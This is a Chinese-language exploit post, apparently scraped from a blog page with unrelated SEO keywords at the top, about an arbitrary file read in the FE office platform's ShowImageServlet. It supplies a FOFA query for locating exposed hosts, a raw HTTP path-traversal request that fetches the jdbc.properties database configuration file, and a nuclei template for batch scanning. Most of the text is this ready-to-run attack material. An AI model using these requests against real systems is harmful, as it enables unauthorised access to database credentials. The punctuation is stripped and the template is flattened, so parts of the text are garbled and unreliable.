c2c模式的典型网站,制作搜索类网站,吴中区做网站的公司,wordpress主题低调与华丽免责声明#xff1a;
文章中涉及的漏洞均已修复#xff0c;敏感信息均已做打码处理#xff0c;文章仅做经验分享用途#xff0c;切勿当真#xff0c;未授权的攻击属于非法行为#xff01;文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…免责声明
文章中涉及的漏洞均已修复敏感信息均已做打码处理文章仅做经验分享用途切勿当真未授权的攻击属于非法行为文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责作者不为此承担任何责任一旦造成后果请自行负责
一漏洞描述
FE办公协作平台是基于业务应用模型驱动开发技术与工作流的协作技术、采用了面向业务部件技术实现应用开发、运行、管理、维护的信息管理平台。该产品ShowImageServlet 文件存在任意文件读取。
二漏洞影响版本
version v6.6.0
三网络空间测绘查询
fofa: app飞企互联-FE企业运营管理平台
四漏洞复现 POC:
GET /servlet/ShowImageServlet?imagePath../web/fe.war/WEB-INF/classes/jdbc.propertiesprint HTTP/1.1
Host: x.x.x.x
Cookie: yourcookie
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9五批量检测
id: Feiqihulian-FE-ShowImageServlet-Arbitrary-file-reads
info:name: Feiqihulian-FE-ShowImageServlet-Arbitrary-file-readsauthor: 芝士土拨鼠severity: highdescription: FE办公协作平台是基于业务应用模型驱动开发技术与工作流的协作技术、采用了面向业务部件技术实现应用开发、运行、管理、维护的信息管理平台。该产品ShowImageServlet 文件存在任意文件读取requests:- raw:- |GET /servlet/ShowImageServlet?imagePath../web/fe.war/WEB-INF/classes/jdbc.propertiesprint HTTP/1.1Host: {{Hostname}}Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q0.9Connection: closematchers-condition: andmatchers:- type: wordpart: bodywords:- sql- type: statusstatus:- 200
